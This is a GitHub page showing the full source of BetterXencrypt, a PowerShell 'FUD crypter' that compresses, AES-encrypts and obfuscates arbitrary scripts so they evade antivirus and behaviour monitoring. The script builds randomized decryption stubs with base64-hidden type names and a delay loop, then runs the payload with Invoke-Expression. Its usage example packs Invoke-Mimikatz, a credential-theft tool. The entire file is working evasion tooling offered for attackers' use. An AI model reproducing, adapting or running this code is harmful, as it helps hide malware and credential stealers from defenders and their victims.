forked from swagkarna/BetterXencrypt
-
Notifications
You must be signed in to change notification settings - Fork 0
/
betterxencrypt.ps1
230 lines (202 loc) · 13.3 KB
/
betterxencrypt.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
Set-StrictMode -Version Latest
$ErrorActionPreference = "Stop"
$PSDefaultParameterValues['*:ErrorAction']='Stop'
function Create-Var() {
#Variable length help vary the length of the file generated
#old: [guid]::NewGuid().ToString().Substring(24 + (Get-Random -Maximum 9))
$set = "abcdefghijkmnopqrstuvwxyz"
(1..(4 + (Get-Random -Maximum 8)) | %{ $set[(Get-Random -Minimum 5 -Maximum $set.Length)] } ) -join ''
}
function Invoke-BetterXencrypt {
<#
.SYNOPSIS
Invoke-BetterXencrypt is a better version of Xencrypt Powershell crypter,cause Xencrypt is not FUD anymore,i recode the stub and "big bang boom",voila!Its FUD again
If you dont know what Xencrypt is,Xencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV. It also lets you layer this recursively however many times you want in order to foil dynamic & heuristic detection.
.DESCRIPTION
____ _ _ __ __ _
| __ ) ___| |_| |_ ___ _ _\ \/ /___ _ __ ___ _ __ _ _ _ __ | |_
| _ \ / _ \ __| __/ _ \ '__\ // _ \ '_ \ / __| '__| | | | '_ \| __|
| |_) | __/ |_| || __/ | / \ __/ | | | (__| | | |_| | |_) | |_
|____/ \___|\__|\__\___|_| /_/\_\___|_| |_|\___|_| \__, | .__/ \__|
|___/|_|
----------------------------------------------------------------------
[-----------------Your Lovely FUD Powershell Crypter-----------------]
[-----------------Recoded With Love By GetRektBoy724-----------------]
[------------------https://github.com/GetRektBoy724------------------]
Invoke-BetterXencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV.
The output script is highly randomized in order to make static analysis even more difficut.
It also lets you layer this recursively however many times you want in order to attempt to foil dynamic & heuristic detection.
Not only that,Invoke-BetterXencrypt-ed script can bypass any behavior monitoring from AVs
.PARAMETER InFile
Specifies the script to encrypt.
.PARAMETER OutFile
Specifies the output script.
.PARAMETER Iterations
The number of times the PowerShell script will be packed & crypted recursively. Default is 2.
.EXAMPLE
PS> Invoke-BetterXencrypt -InFile Invoke-Mimikatz.ps1 -OutFile banana.ps1 -Iterations 3
.LINK
https://github.com/GetRektBoy724/BetterXencrypt
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[string] $infile = $(Throw("-InFile is required")),
[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[string] $outfile = $(Throw("-OutFile is required")),
[Parameter(Mandatory=$false,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[string] $iterations = 2
)
Process {
$banner = @"
____ _ _ __ __ _
| __ ) ___| |_| |_ ___ _ _\ \/ /___ _ __ ___ _ __ _ _ _ __ | |_
| _ \ / _ \ __| __/ _ \ '__\ // _ \ '_ \ / __| '__| | | | '_ \| __|
| |_) | __/ |_| || __/ | / \ __/ | | | (__| | | |_| | |_) | |_
|____/ \___|\__|\__\___|_| /_/\_\___|_| |_|\___|_| \__, | .__/ \__|
|___/|_|
----------------------------------------------------------------------
[-----------------Your Lovely FUD Powershell Crypter-----------------]
[-----------------Recoded With Love By GetRektBoy724-----------------]
[------------------https://github.com/GetRektBoy724------------------]
"@
Write-Output "$banner"
# read
Write-Output "[*] Reading '$($infile)' ..."
$codebytes = [System.IO.File]::ReadAllBytes($infile)
for ($i = 1; $i -le $iterations; $i++) {
# Decide on encryption params ahead of time
Write-Output "[*] Starting code layer ..."
$paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros'
$paddingmode = $paddingmodes | Get-Random
$ciphermodes = 'ECB','CBC'
$ciphermode = $ciphermodes | Get-Random
$keysizes = 128,192,256
$keysize = $keysizes | Get-Random
$compressiontypes = 'Gzip','Deflate'
$compressiontype = "Deflate"
# compress
Write-Output "[*] Compressing ..."
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
if ($compressiontype -eq "Gzip") {
$compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
} elseif ( $compressiontype -eq "Deflate") {
$compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
}
$compressionStream.Write( $codebytes, 0, $codebytes.Length )
$compressionStream.Close()
$output.Close()
$compressedBytes = $output.ToArray()
# generate key
Write-Output "[*] Generating encryption key ..."
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
if ($ciphermode -eq 'CBC') {
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
} elseif ($ciphermode -eq 'ECB') {
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB
}
if ($paddingmode -eq 'PKCS7') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
} elseif ($paddingmode -eq 'ISO10126') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126
} elseif ($paddingmode -eq 'ANSIX923') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923
} elseif ($paddingmode -eq 'Zeros') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
}
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.GenerateKey()
$b64key = [System.Convert]::ToBase64String($aesManaged.Key)
# encrypt
Write-Output "[*] Encrypting ..."
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length);
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$aesManaged.Dispose()
$b64encrypted = [System.Convert]::ToBase64String($fullData)
#reverse base64 encrypted for obfuscation ;)
$reversingb64encrypted = $b64encrypted.ToCharArray()
[array]::Reverse($reversingb64encrypted)
$b64encryptedreversed = -join($reversingb64encrypted)
# write
Write-Output "[*] Finalizing code layer ..."
# now, randomize the order of any statements that we can to further increase variation
$stub_template = ''
$code_alternatives = @()
$code_alternatives += '${19} = 0' + "`r`n"
$code_alternatives += '${20} = 50000000' + "`r`n"
$code_alternatives += 'For (${19}=0; ${19} -lt ${20}) {17} ${19}++ {18}' + "`r`n"
$stub_template += $code_alternatives -join ''
$code_alternatives = @()
$code_alternatives += '${11} = "{0}"' + "`r`n"
$code_alternatives += '${9} = ${11}.ToCharArray()' + "`r`n"
$code_alternatives += '[array]::Reverse(${9})' + "`r`n"
$code_alternatives += '${10} = -join(${9})' + "`r`n"
$stub_template += $code_alternatives -join ''
$code_alternatives = @()
$code_alternatives += '${2} = [System.Convert]::FromBase64String("${10}")' + "`r`n"
$code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n"
#aes managed but its base64 encoded ;)
$code_alternatives += '${12} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg=="))' + "`r`n"
$code_alternatives += '${4} = New-Object "${12}"' + "`r`n"
$stub_template += $code_alternatives -join ''
$code_alternatives = @()
#ciphermode but its base64 encoded ;)
if ($ciphermode -eq "ECB") {
$code_alternatives += '${13} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg=="))' + "`r`n"
$code_alternatives += '${14} = & ([scriptblock]::Create(${13}))' + "`r`n"
$code_alternatives += '${4}.Mode = ${14}' + "`r`n"
}elseif ($ciphermode -eq "CBC") {
$code_alternatives += '${13} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw=="))' + "`r`n"
$code_alternatives += '${14} = & ([scriptblock]::Create(${13}))' + "`r`n"
$code_alternatives += '${4}.Mode = ${14}' + "`r`n"
}
#paddingmode but its base64 encoded ;)
if ($paddingmode -eq 'PKCS7') {
$code_alternatives += '${15} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw=="))' + "`r`n"
$code_alternatives += '${16} = & ([scriptblock]::Create(${15}))' + "`r`n"
$code_alternatives += '${4}.Padding = ${16}' + "`r`n"
} elseif ($paddingmode -eq 'ISO10126') {
$code_alternatives += '${15} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg=="))' + "`r`n"
$code_alternatives += '${16} = & ([scriptblock]::Create(${15}))' + "`r`n"
$code_alternatives += '${4}.Padding = ${16}' + "`r`n"
} elseif ($paddingmode -eq 'ANSIX923') {
$code_alternatives += '${15} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw=="))' + "`r`n"
$code_alternatives += '${16} = & ([scriptblock]::Create(${15}))' + "`r`n"
$code_alternatives += '${4}.Padding = ${16}' + "`r`n"
} elseif ($paddingmode -eq 'Zeros') {
$code_alternatives += '${15} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw=="))' + "`r`n"
$code_alternatives += '${16} = & ([scriptblock]::Create(${15}))' + "`r`n"
$code_alternatives += '${4}.Padding = ${16}' + "`r`n"
}
$code_alternatives += '${4}.BlockSize = 128' + "`r`n"
$code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n"
$code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n"
$stub_template += $code_alternatives -join ''
$code_alternatives = @()
$code_alternatives += '${6} = New-Object System.IO.MemoryStream(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n"
$code_alternatives += '${7} = New-Object System.IO.MemoryStream' + "`r`n"
$stub_template += $code_alternatives -join ''
if ($compressiontype -eq "Gzip") {
$stub_template += '${5} = New-Object System.IO.Compression.GzipStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
} elseif ( $compressiontype -eq "Deflate") {
$stub_template += '${5} = New-Object System.IO.Compression.DeflateStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
}
$stub_template += '${5}.CopyTo(${7})' + "`r`n"
$code_alternatives = @()
$code_alternatives += '${5}.Close()' + "`r`n"
$code_alternatives += '${4}.Dispose()' + "`r`n"
$code_alternatives += '${6}.Close()' + "`r`n"
$code_alternatives += '${8} = [System.Text.Encoding]::UTF8.GetString(${7}.ToArray())' + "`r`n"
$stub_template += $code_alternatives -join ''
$stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n"
# it's ugly, but it beats concatenating each value manually.
[string]$code = $stub_template -f $b64encryptedreversed, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), ("{"), ("}"), (Create-Var), (Create-Var)
$codebytes = [System.Text.Encoding]::UTF8.GetBytes($code)
}
Write-Output "[*] Writing '$($outfile)' ..."
[System.IO.File]::WriteAllText($outfile,$code)
Write-Output "[+] Done!"
}
}